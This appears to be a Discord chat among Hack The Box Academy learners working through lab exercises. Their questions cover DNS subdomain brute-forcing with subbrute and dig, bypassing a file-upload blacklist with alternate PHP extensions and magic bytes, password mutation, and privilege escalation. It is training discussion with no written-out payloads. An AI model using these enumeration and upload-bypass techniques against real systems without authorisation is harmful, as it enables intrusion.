hi I'm doing the Attacking DNS section of Attacking Common Services module. The only question at the end of the module is Find all available DNS records for the "inlanefreight.htb" domain on the target name server and submit the flag found as a DNS record as the answer. The thing is I am using subbrute just like the section describes. I started it up a few minutes ago and its taking time to complete. I used to exact subbrute command from the section on the target domain name. Do I need to subbrute the target server it gives me? How long should subbrute take? Should I use the -t 50 option to speed it up?

Yes you need to target the server it gives you

Public nameservers won't resolve inlanefreight.htb

I think .htb should be a new TLD

Won't matter anyway

It was a joke.

Since it's hosted on a private network

Pfff

C'mon. A bit of humor please.

¯_(ツ)_/¯

You need to query the machine at hand. So not on the Internet.

?

https://tenor.com/view/why-huh-but-why-gif-13199396

You provided 0 context for them to want to check dms

Yes

#rules actually

No dming anyone without consent

? I am confused now. Who are you sending DMs to?

"hey can I dm you about the module i was working on earlier"
^ a simple enough Q

exactly!

It is called Netiquette

Considering context got a bit pushed with mark

What are you on about?

Yeah but ask first is the point

What even is "that" matter?

Instead of being goofy and going

(dont) check dms

The footprinting smb section

There's other ways of enumerating version

I made a new resolver.txt file to replace resolvers.txt and put the target IP address as the only resolver. Now, its giving me results. Do I need to replace names.txt as well?

granted, it is taking a little time but the results I'm getting are much better

Geez. My mistake. I now see that @nikt47 is actually bestcatever

No

still odd that nmap on pwnbox gives a different result than an up-to-date Kali machine

it's touchy ¯_(ツ)_/¯

ok should I just wait it out? would using the -t 50 option be appropriate to speed it up?

Just wait it out, and check results as they come in

ok thanks

Must be latest version as I did that module a while ago and I got the right results. And I never use the pwnbox

The names.txt file is large

Some labs are just touchy and weird

Like the one I do now? Hahaha. I am doing something wrong as I am waiting for a correct pwd hit for hours now.

If it's taking hours, you're doing something wrong

I know

Just taking the doubt out lol

Staring at this for long now hahaha

I forget, is this section before or after the mutations section

It is THE mutation one.

Ah

Well, have fun

If I use the supplied rules file, the pwd list file gets real long

If I use the rules file in the module as codeblock, it is way shorter, but no success hit.

The wordlist should be ~94k words

It is

Don't use the codeblock rules

Everything is provided in the resources button

Then I have the correct one

Yep, that's correct

Thought my scrshot was corrupt. LOL

Then I will just take a drink, smoke one and wait.

And in the meantime read the next module.

Next section *

Module is the overall thing section is what you're working on

Correct. My mistakke.

To save headache later
save any creds you find

Hmm, good one. Because it is "just" the Academy, I tend to not make many notes.

how long does it normally take to find the right DNS record? in the real world, wouldn't it take even longer?

unless you use -t 100 or something?

with what method? What record?

brute forcing domains with subbrute

Not needed. You can get the answer instantly.

ok

Just use dig or so, but point it at the machine you spun up.

I mean to brute force subdomains

ok then what's the point in ever using subbrute?

why is the exercise having me do it?

for the "inlanefreight.htb" domain on the target name server <- look at the last 2 words.

does it?

Yes use subbrute if it tells you

can you tell again what module/section?

yes because dig AXFR gives me an error if I try and subbrute is included as a means of brute forcing subdomains

check

the question is Find all available DNS records for the "inlanefreight.htb" domain on the target name server and submit the flag found as a DNS record as the answer. dig won't work it gives me an error

I tried so the only answer is subbrute

and subbrute is slowly giving me more and more results

why would anyone use subbrute if you always could get the answer with dig instantly?

Then wait

You can dig <sub.domain>

You don't have to use axfr

You won’t

You have to find the subdomain first

ok got it

Excuse me, do you think that it's okay to skip the vulnerability scanning module for now?

I finished that right before aen

aen?

The last module

so i can skip it right?

for now i mean

I wouldn't skip.

because Dig can have its security configured correctly.

If your aim is to go towards a cert, go through all the modules.

Also you have the practical exercise at the end

If you're not going towards an exam, and don't care about vuln scanning, go for it

thing is i am writing everything, and this module doesn't feel very exciting, and it feels more directed to real cybersec which is not yet now

It doesn't take long to get through tbh

thing is, i am writing ALL the lessons using cherry tree

All of academy is cybersec

I mean do you know the subject already?

Are you working towards an exam?

Are you summarizing or copying verbatim

I hope not the latter

Even if you know the subject, go through the module

Its a must to apply for a cert exam even.

Plus you always learn something.

Most of the time.

absolutely, but is it This time? i don't have an exam

Just... why skip skip skip skip, then get to the end and post here going "how do I think this?"

It happens so often

i don't do that, just this topic and nessus, makes me feel like i am doing Blue team

Then why are you even going through it if you're just coping the content

so demotivating hahahaha

The vuln assessment module easily takes the least amount of time

https://tenor.com/view/running-quick-fast-running-fast-sprint-gif-11390031044419433068

forces you to read everything

You started it..

reading is good for your brain

..make the most of it and finish it

I have one of those?

LMAO

Also guys, when do you suggest to start doing some easy machines?

because i was trying to do as the first lesson suggested, to do an easy machine immidiately after each module

Whenever you want

but most of the times, you find stuff you still didn't learn about yet

Correct

Thats the fun

Because the labs are created independently of academy

It's always a game of research

All boxes come with research... there hasn't been a single box where the academy modules are sufficient

thing is, i don't want to look at walkthroughs

Makes your brain work real hard.

Well active machines don't have walkthroughs

Almost every machines is going to have something you don’t know about

You don't need to look at walkthroughs btw

And you dont HAVE to look at a walkthrough

Encounter something? Google that something

you beat me to it

thing is, you don't have the confidence when you are at such a stage

Not Google "<box>"

like how are you sure you didn't miss up on something

Neither did I when I signed up in 2017

It's a shift in perspective

Instead of looking for the box, looking for the technology in use

See what seems "off"

getting started - public exploits

That section shows how to look for things

i am a good researcher online

so i don't mind searching but

As every box has a publicly researchable vuln

It's literally part of the requirements

do you mean by every box, a machine or a question?

https://help.hackthebox.com/en/articles/5307061-machine-submission-requirements

On the main site ^

box refers to machine in https://app.hackthebox.com/machines

yeah, whitebox machine, greybox machine and blackbox machine

All the boxes in hack the box are considered blackbox despite some of them leaking the code intentionally

bruteforcing should always be a last step right?

it depends

But for boxes, only if hinted at

Most of the boxes don't need bruteforcing above 2 minutes when the right techniques are used

will the flag be in the traditional HTB{flag} format?

On boxes not. There it is a hash

usually, but not always

I mean for the section I'm on in academy

Sorry. I missed the context

the Attacking DNS section of Attacking Common Services

They will be yes.

ok thanks

As far as I see on the Academy all the time.

ok thanks

there are some modules which dont use this format but they are very few

ok got it

thx for that clarification

i have seen flags that are in hexadecimal format i think

in the real world, if dig is configured correctly and dig AXFR doesn't work on an actual website, and if in that case subbrute is necessary, doesn't that mean doing subbrute in that instance will take much longer than doing subbrute on Hack the Box Academy?

or a hash probably

I know I asked earlier but I think I got an answer to the wrong question

because I didn't clarify well enough

Hi

On the file upload attacks and doing the blacklist part

got this

it would take longer in the same way that accessing a website on the net might take longer than accessing a website on hackthebox academy. It just depends on what your ping is to the dns server.

wrong extension?

ok so basically, how much latency is there?

There werent any errors in my php command but I think there may have been some errors with the magic bytes. Can I put some more magic bytes in the request and cut it off randomly?

file extension has a 3 at the end

ahhh

yeah

thanks

wait a min

thats the right extension

php3 is allowed

php isnt

curl the url to see the contents without it erroring out

if you want to see the contents that is

it doesnt stop at php3 tho

there are others

I hate php... despite it being vuln asf

is the php3 extension wrong or sumin? In the fuzz it said it wass vulnerable to php 3

sometimes it's an md5 hash

just because it's accepted doesn't mean it's vulnerable

just because it uploads doesnt mean its the right one

https://tenor.com/view/jinx-seinfeld-gif-5355403

wait, then if its accepted, how do we KNOW which one is vulnerable?

because in burp it gave the same lengths

and there were possibly 5 others

test each of the accepted ones; visiting in browser and looking at the page source will be a good clue

the accepted, but not vulnerable, ones comment out the code

<!-- -->

okay let me try that

A fun but simple project for you would be to automate the vuln check

sometimes its just text that doesnt follow any format

Right. I am losing patience as I am doing something wrong for the Pwd attack/mutate section. Its all fun here, but in the meantime I also want to find the right pwd. Who is so kind to get me on track? Possibly in a DM, so I dont paste spoilers?

i can dm

that is kind of you

@fathom pendant thank you guys for your help I managed to solve it 😄 @safe star & @waxen totem @unborn summit . @fathom pendant u remember yesterday when it was base 64 encoding. Could you please tell me why the heck it was doing that?

something you did was returning it as base64

And I want to thank @unborn summit for pointing out that I forgot about netexec

ok so I got several domains

but I haven't gotten any flag.

I think that its related to the last URL it gave me.

dig sub.domain.htb

don't do axfr

wait I tried that

I found flag already tho just before I saw your answer

you answered too late and what you said didn't work

Forgot the @ip

¯_(ツ)_/¯

ya I know I typed it wrong when typing it on discord

but when I did that included that bit

I deleted it because it was revealing the answer

ok

I meant i forgot the ip part

You had it in the copy/paste

ya point taken. I thought if it was marked as a spoiler that it would be fine.

spoiler text does nothing

ok

Anyone can click it or even disable it in settings

then why do we even have spoiler text?

that sounds stupid

You can still do some obfuscation behind the spoiler text

I.e. doing sub.domain.htb instead of the answer

ok I see got it

Thay way those who know, get it

Also it's not an htb discord feature, it's just a discord feature that can't be enabled/disabled on serverside

It's just baked into the markdown format

ok got it. I won't do it again.

Like heading tags

They can block things like masked links []() because they can do a regex search for text between [] and ()

is the next module difficult? the one on Pivoting, Tunneling, and Port Forwarding?

the current one seems easier than previous one

I know AD module will be super super difficult

@pine dune remember the conversation we had about my notion automation? Figured out how to do it in Obsidian using the dataview plugin,

Template Note

---
date: {{date}}
---

Review Note

```dataview
TABLE date
WHERE date AND date = date(yesterday) OR date = date(today) - dur(1 w) OR date = date(today) - dur(1 mo)

Hi folks. Can I please get a nudge on getting bob_adm credentials? Windows Privilege Escalation module

I moved to Kali what I thought was the file ... but it is empty...

can someone please help me?

looks like the file is empty

I know, lol

I guess that suppose to be the file

but is empty

so obviously, can't get any password from an empty file.

is this a rabbit hole?

I tried the one that starts with ||"Strong"|| ... but that does not seem correct either, although the document indicates it corresponds to bob_adm

hi, can I DM you? stuck on same exercise.... I think I found the right file that contains bob_adm password but it is empty

Does anyone have machine spawning issue?

I cannot spawn the machine for the last 20 minutes

nope

no issues here

Okay I see. It's working now

Taking a side-step to module Cracking Passwords with Hashcat now. Very nice and some new stuff for me.

Recommended.

By me, for what that is worth LOL

Question, I've been reading the report on the exam is pretty important. Would it be a good idea to skip to the report module and write reports for each module? Or is it the last module on purpose?

It's near the end on purpose

As it requires some knowledge of other topics to complete, it's assuming you know the stuff

Also i wouldn't write a report for each module, as most aren't really gonna have enough to fill up a report on

Okay figured I'd get ahead on report writing but I'll be patient 😌

Just start getting used to making proper notes. Chose your favorite note-taking app and get used to it. Read about what a proper report needs and then just make it a habit to make notes that would fit in a report..

Really, read up a bit about what a proper report is. The report is not for you. It is for the client you work for.

well yeah, but being truly honest, it'd be BETTER to do reports on retired machines

unless you want to just do the skill assessments?

¯_(ツ)_/¯

but as i said the reporting module requires knowledge from a fair bit of the modules to be successful at completing it, unless you just read the reporting portions then come back later to complete it